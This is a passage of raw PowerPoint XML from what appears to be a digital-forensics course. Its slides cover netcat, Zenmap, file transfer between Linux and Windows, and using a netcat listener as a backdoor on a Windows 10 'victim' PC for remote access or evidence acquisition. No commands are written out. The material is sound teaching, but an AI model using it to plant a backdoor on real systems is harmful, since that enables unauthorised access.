            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is integrated into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Zenmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>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211001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E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="757675" y="1053703"/>
            <a:ext cx="10258981" cy="4763500"/>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63BF08B5-58DD-CB09-FD46-A825C6314B9A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6202127" y="6060519"/>
              <a:ext cx="1440" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63BF08B5-58DD-CB09-FD46-A825C6314B9A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6193127" y="6051519"/>
                <a:ext cx="19080" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>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427580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fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Bent-Up Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6948606" y="3353537"/>
            <a:ext cx="1035004" cy="113148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7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6360017" y="4733552"/>
            <a:ext cx="5068007" cy="1092352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="1"/>
            <a:ext cx="6399252" cy="4140017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E051C2F-9025-48D3-8554-B0E0E3B004AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7169124" y="2135515"/>
            <a:ext cx="4623638" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This slide: send a file from Linux to Win</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your homework is: sent a file from Win to Linux</a:t>
            </a:r>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EDFF498D-D4F3-23C4-B8E5-384CCA35164D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10901567" y="1395999"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDFF498D-D4F3-23C4-B8E5-384CCA35164D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10892567" y="1387359"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>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56228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Create a backdoor at Window 10/Remote File Acquisition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="6297084"/>
            <a:ext cx="732367" cy="524933"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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6C1D5EF-A478-2D77-CFC4-CB7513BD80CE}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5897369" y="1658403"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C1D5EF-A478-2D77-CFC4-CB7513BD80CE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5888369" y="1649763"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>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035595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BC4124-87C8-4743-8E1C-273BB86DC97E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same Goal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7032E3DA-7F7C-4137-9921-D28D7A17B054}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack: Remote access a victim’s PC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digital Forensic: Remote evidence acquisition </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>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063836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p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced Linux Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2871076-CFC8-4CD5-BF65-ECB4ACAEF8D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote File Acquisition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>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325061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Backdoor background</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="691306" y="3101419"/>
            <a:ext cx="9244345" cy="2167923"/>
            <a:chOff x="1220568" y="4947656"/>
            <a:chExt cx="16789969" cy="4722849"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="pasted-image.tif"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220568" y="6319169"/>
              <a:ext cx="2050617" cy="2050617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 201"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4531579" y="5705086"/>
              <a:ext cx="2122268" cy="1112395"/>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sz="2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>std input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 202"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4550624" y="7663171"/>
              <a:ext cx="2164425" cy="1023276"/>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sz="2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1867" dirty="0"/>
                <a:t>std output</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Shape 203"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3381619" y="6442023"/>
              <a:ext cx="1083158" cy="438163"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 204"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3321689" y="7804900"/>
              <a:ext cx="1079942" cy="355834"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Picture 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579816" y="6023612"/>
              <a:ext cx="5434477" cy="101603"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 32"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="6463892"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Picture 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="7937137"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="8428218"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Shape 213"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="12026615" y="6185254"/>
              <a:ext cx="1092679" cy="38024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7" name="Shape 214"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12117936" y="7804899"/>
              <a:ext cx="838107" cy="523630"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Shape 215"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8298014" y="6294553"/>
              <a:ext cx="2390972"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9" name="Shape 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8233576" y="8233479"/>
              <a:ext cx="2519848"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40" name="Shape 217"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8901674" y="4947656"/>
              <a:ext cx="1379383" cy="1529499"/>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dirty="0" err="1"/>
                <a:t>tcp</a:t>
              </a:r>
              <a:endParaRPr sz="3377" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Shape 218"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9012254" y="8141006"/>
              <a:ext cx="1379383" cy="1529499"/>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a:t>tcp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 219"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13351927" y="6095079"/>
              <a:ext cx="3841634" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>puts input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Shape 220"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13246136" y="7266198"/>
              <a:ext cx="4764401" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>receive</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2133" dirty="0"/>
                <a:t> output</a:t>
              </a:r>
              <a:endParaRPr sz="2133" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9675751" y="3705465"/>
            <a:ext cx="1357165" cy="870848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774914" y="4722416"/>
            <a:ext cx="851932" cy="674832"/>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b="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9800404" y="4675773"/>
            <a:ext cx="1097577" cy="674832"/>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b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Attacker </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for attack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14445" y="1514459"/>
            <a:ext cx="990052" cy="990052"/>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Arrow Connector 48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1026" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1561278" y="2009485"/>
            <a:ext cx="3353167"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74914" y="1985521"/>
            <a:ext cx="3100220" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Let a victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to a hidden communication channel (backdoor)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7793921" y="1809876"/>
            <a:ext cx="3132976" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
